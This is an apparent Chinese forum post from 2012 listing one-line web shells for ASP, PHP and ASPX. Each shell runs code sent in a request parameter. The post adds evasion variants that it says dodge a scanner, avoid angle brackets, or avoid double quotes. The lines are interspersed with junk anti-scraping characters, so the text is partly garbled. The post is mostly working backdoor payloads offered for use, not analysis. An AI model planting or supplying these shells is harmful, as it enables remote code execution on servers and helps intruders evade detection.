asp一句话 <%execute(request("1"))%> $ a/ F9 M1 Y! d5 ^1 J P
/ r5 i3 P. X/ _5 X" d# ~% O
php一句话 <?php eval($_POST[1]);?>
3 u) [8 E2 O0 O5 B5 V% k& g) k
4 Z. U7 f- A+ M1 y. z% M2 [aspx一句话
/ h. d0 d5 s# G5 J7 A& g x& b1 U( G( W/ g2 M, Y
<script language="C#" runat="server">
* S& A6 h7 B* A; Q) L# s. K) F/ q" U8 A
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y ("add6bb58e139be10");% S& b( w* l& v
/ v+ q) V+ t0 R: g1 B
</script>& T. g' w) i9 T* M9 _
5 A$ ^8 F( O7 J+ u+ P+ v
可以躲过雷客图的一句话。" J+ u2 I4 }5 f3 F! N: f
4 Q- k1 P" w8 O8 H- P
<%8 Y# U8 Z0 [* R
/ t) Q8 Y* F' X0 Q5 ~2 J$ S3 P2 E
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
. _. |' f6 m |2 v8 `2 T/ q6 E2 R- M: j
ms.Language="VBScript"4 z' l- X6 Q9 S4 s. Y
. j( _- z6 t# H0 t$ `8 A) P1 @+ r! E ms.AddObject "Response", Response7 U* W A7 f8 Y. b7 x0 q4 U
" q- @: k: R; d6 P `% n
ms.AddObject "request", request
1 x Y& ?( _6 a
7 n- G6 ~& \7 U [2 s) Z7 B ms.ExecuteStatement("ev"&"al(request(""1""))")% d+ s+ T: p, l y- r% P( ]
0 o; U! _) F; \- N %>
' u3 i1 D; f& x* V6 P# a7 U7 h2 W
! |+ j4 N' ?4 h6 R- f9 R 不用'<,>'的asp一句话; _& P+ Z/ W H) H9 T7 d- Q, Q
5 Y9 v6 s$ f# }: Z4 x <script language=VBScript runat=server>execute request("1")</script>
8 t: a9 N6 B" v; k5 z3 H% U# m0 o+ N9 [/ j- q" s; i. E' z" O7 u
不用双引号的一句话。
: c: @; F5 G l5 K! K
. }0 J0 q4 b: n8 M, H2 h6 B <%eval request(chr(35))%>
1 {$ s+ P/ |- C0 U9 [5 @& s* W |
发表于 2012-9-23 14:36:09
收藏
支持
反对